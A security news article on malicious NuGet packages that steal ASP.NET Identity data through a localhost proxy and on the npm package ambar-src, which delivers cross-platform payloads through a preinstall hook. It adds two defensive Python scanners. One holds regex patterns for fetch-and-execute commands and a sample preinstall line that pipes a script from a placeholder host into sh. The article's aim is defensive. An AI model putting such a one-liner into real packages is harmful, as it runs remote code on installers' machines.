Malicious NuGet Packages Stole ASP.NET Data; npm Package Dropped Malware
Four Malicious NuGet Packages Exposed: The Silent Threat Targeting ASP.NET Developers
In a chilling discovery that has sent shockwaves through the developer community, cybersecurity researchers have uncovered a sophisticated malware campaign specifically engineered to compromise ASP.NET web applications. This insidious attack represents a new frontier in software supply chain threats: malicious actors are no longer content with simply infecting developer machines; they are targeting the very applications these developers build.
The Discovery That Changed Everything
Socket, a leading software supply chain security company, recently identified four malicious NuGet packages that had collectively amassed over 4,500 downloads before being swiftly removed from the official repository. These packages (NCryptYo, DOMOAuth2, IRAOAuth2.0, and SimpleWriter) were published between August 12 and 21, 2024, by a user named “hamzazaheer.”
What makes this campaign particularly alarming is its surgical precision. Unlike traditional malware that seeks to compromise individual machines, these packages are designed to infiltrate the applications themselves, creating persistent backdoors that remain active even after deployment to production environments.
The Anatomy of a Supply Chain Attack
The attack chain is a masterpiece of malicious engineering, with each package playing a specific role in the broader compromise strategy.
NCryptYo: The Silent Dropper
NCryptYo serves as the campaign’s first-stage dropper, masquerading as a legitimate cryptographic package. Upon loading, its static constructor installs JIT (Just-In-Time) compiler hooks that decrypt embedded payloads and deploy a critical component: a localhost proxy running on port 7152. This proxy acts as a relay station, forwarding traffic between the companion packages and an attacker-controlled command-and-control (C2) server.
The C2 server’s address is dynamically resolved at runtime, making detection and blocking significantly more challenging. This architectural choice demonstrates the attackers’ sophistication and their understanding of modern defensive mechanisms.
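Two checks a defender can run against the behaviour described above, written here as an added example (not Socket's tooling or code from the packages): scan a .csproj for PackageReference entries matching the reported package IDs, and scan `ss -ltnp` output for a loopback listener on port 7152 held by a process. The csproj and ss samples are constructed; the regex assumes the `users:(("name",pid=N,fd=M))` column format that `ss -p` prints.

```python
import re
import xml.etree.ElementTree as ET

# Package IDs named in the article (both spellings the article uses are included).
KNOWN_BAD_NUGET = {"ncryptyo", "domoauth2", "domoauth2_", "iraoauth2.0",
                   "simplewriter", "simplewriter_"}
PROXY_PORT = 7152  # loopback relay port described in the article

def bad_package_references(csproj_xml: str) -> list[str]:
    """Return PackageReference IDs in a .csproj that match the reported names (case-insensitive)."""
    root = ET.fromstring(csproj_xml)
    hits = []
    for node in root.iter():
        if node.tag.endswith("PackageReference"):
            pkg = node.get("Include") or node.get("Update") or ""
            if pkg.lower() in KNOWN_BAD_NUGET:
                hits.append(pkg)
    return hits

# One LISTEN row of `ss -ltnp`, e.g.
# LISTEN 0 4096 127.0.0.1:7152 0.0.0.0:* users:(("dotnet",pid=4242,fd=9))
SS_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
                     r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')

def loopback_proxy_listeners(ss_output: str, port: int = PROXY_PORT) -> list[tuple[str, int]]:
    """Return (process, pid) pairs listening on `port` bound to loopback only; worth triage on an ASP.NET host."""
    found = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m or int(m["port"]) != port:
            continue
        if m["addr"] in ("127.0.0.1", "[::1]", "::1"):
            found.append((m["proc"], int(m["pid"])))
    return found

# Constructed samples: a project that pulled in NCryptYo, and an ss snapshot with a loopback listener.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="Microsoft.AspNetCore.Identity.EntityFrameworkCore" Version="8.0.0" />
    <PackageReference Include="NCryptYo" Version="1.0.3" />
  </ItemGroup>
</Project>"""
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096   127.0.0.1:7152     0.0.0.0:*         users:(("dotnet",pid=4242,fd=9))
LISTEN 0      511    0.0.0.0:5000       0.0.0.0:*         users:(("dotnet",pid=4242,fd=7))
"""

if __name__ == "__main__":
    print(bad_package_references(SAMPLE_CSPROJ), loopback_proxy_listeners(SAMPLE_SS))
```

A listener on 7152 is only an indicator, not proof; confirm by checking which assembly opened the socket before acting on it.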
DOMOAuth2_ and IRAOAuth2.0: The Data Exfiltrators
These two packages work in tandem to steal ASP.NET Identity data—a treasure trove of information including user accounts, role assignments, and permission mappings. Once the NCryptYo proxy is active, these packages begin transmitting sensitive data through the local proxy to the external C2 infrastructure.
But the attack doesn’t stop at data theft. The C2 server responds with authorization rules that are processed by the application to create persistent backdoors. This could involve granting the attackers admin roles, modifying access controls, or disabling security checks entirely.
SimpleWriter_: The Stealth Execution Engine
SimpleWriter_ presents itself as a PDF conversion utility, but its true capabilities are far more sinister. This package features unconditional file writing and hidden process execution capabilities, allowing the threat actors to write arbitrary content to disk and execute dropped binaries with hidden windows.
The Single Threat Actor Behind the Curtain
Analysis of package metadata has revealed identical build environments across all four packages, indicating that this campaign is the work of a single, sophisticated threat actor. The level of coordination and the specific targeting of ASP.NET Identity data suggest this may be a state-sponsored operation or a highly organized cybercrime group with significant resources.
The Broader Implications
“This campaign’s objective is not to compromise the developer’s machine directly, but to compromise the applications they build,” explained security researcher Kush Pandya. “By controlling the authorization layer during development, the threat actor gains access to deployed production applications.”
This distinction is crucial. Traditional malware might infect a developer’s workstation, but these packages ensure that the compromise persists in the final product. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules.
The threat actor or their buyers can then grant themselves admin-level access to any deployed instance, effectively owning every application built with these compromised packages.
The NPM Connection: A Parallel Threat Emerges
Just as the NuGet package discovery was making headlines, Tenable disclosed details of a malicious npm package named ambar-src that had amassed over 50,000 downloads before removal. This parallel discovery highlights a broader trend in the software supply chain ecosystem.
Ambar-src, uploaded to npm on February 13, 2026, employs npm’s preinstall script hook to trigger malicious code execution during installation. The malware is designed to run a one-liner command that obtains different payloads from the domain “x-ya[.]ru” based on the operating system:
- Windows: Downloads and executes msinit.exe containing encrypted shellcode
- Linux: Fetches a bash script that retrieves an ELF binary functioning as an SSH-based reverse shell client
- macOS: Executes JavaScript that drops Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework
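Because the npm delivery relies on a preinstall hook, auditing the lifecycle scripts of every dependency before they run is the check that would have surfaced it. The following is an added example, not Tenable's tooling or the real ambar-src script: it reads a package.json, reports each install-time hook, and flags commands that match download-and-execute patterns (the patterns and both manifests are constructed for illustration).

```python
import json
import re

# Hooks npm runs automatically during `npm install`; ambar-src abused preinstall.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics for fetch-and-run one-liners (not taken from the Tenable report).
FETCH_EXEC = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b"),
    re.compile(r"\bpowershell\b.*(-enc|DownloadString|Invoke-WebRequest|iwr)\b", re.I),
    re.compile(r"\bnode\s+-e\b.*\bhttps?://"),
    re.compile(r"\b(osascript|bash|sh)\b\s+-c\b.*\bhttps?://"),
]

def audit_manifest(manifest_json: str) -> list[dict]:
    """Return one finding per install-time hook; 'suspicious' is True when a fetch-and-execute pattern matches."""
    pkg = json.loads(manifest_json)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        findings.append({
            "package": pkg.get("name", "?"),
            "hook": hook,
            "command": cmd,
            "suspicious": any(p.search(cmd) for p in FETCH_EXEC),
        })
    return findings

# Constructed manifests: a native addon that legitimately builds on install, and a
# stand-in package whose preinstall pulls a script from a placeholder host and pipes it to sh.
BENIGN = json.dumps({"name": "some-native-addon", "version": "1.0.0",
                     "scripts": {"install": "node-gyp rebuild"}})
SUSPECT = json.dumps({"name": "example-pkg", "version": "0.0.1",
                      "scripts": {"preinstall": "curl -fsSL http://example.invalid/x.sh | sh"}})

if __name__ == "__main__":
    for manifest in (BENIGN, SUSPECT):
        for f in audit_manifest(manifest):
            print(f)
```

Running `npm install --ignore-scripts` and only re-enabling scripts for packages this audit has cleared keeps a hook like ambar-src's from executing at all.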
The Evasion Techniques
Ambar-src employs multiple techniques to evade detection, including dropping open-source malware with advanced capabilities. The package targets developers across Windows, Linux, and macOS hosts, demonstrating the attackers’ commitment to cross-platform compromise.
Once data is collected, it is exfiltrated to a Yandex Cloud domain in an effort to blend in with legitimate traffic and to take advantage of the fact that trusted services are less likely to be blocked within corporate networks.
The Mythic Connection
Ambar-src is assessed to be a more mature variant of eslint-verify-plugin, another rogue npm package recently flagged by JFrog for dropping Mythic agents Poseidon and Apfell on Linux and macOS systems. This connection suggests a broader ecosystem of supply chain attacks leveraging the Mythic C2 framework.
The Harsh Reality
“If this package is installed or running on a computer, that system must be considered fully compromised,” Tenable stated bluntly. “While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software.”
This sobering assessment underscores the severity of these supply chain attacks. The compromise extends far beyond the initial package installation, potentially affecting every application built with the compromised dependencies.
The Path Forward
These discoveries serve as a wake-up call for the entire software development community. The traditional approach of trusting package repositories is no longer sufficient. Developers must implement comprehensive supply chain security measures, including:
- Rigorous package vetting and dependency scanning
- Runtime monitoring for unusual behavior
- Regular security audits of development environments
- Zero-trust principles applied to software dependencies
The sophistication of these attacks demonstrates that malicious actors are investing significant resources in targeting the software supply chain. As applications become increasingly critical to business operations and daily life, these attacks will only become more prevalent and more dangerous.
The battle for software supply chain security has entered a new phase, and developers, security researchers, and platform providers must adapt quickly to protect the integrity of the applications we all depend on.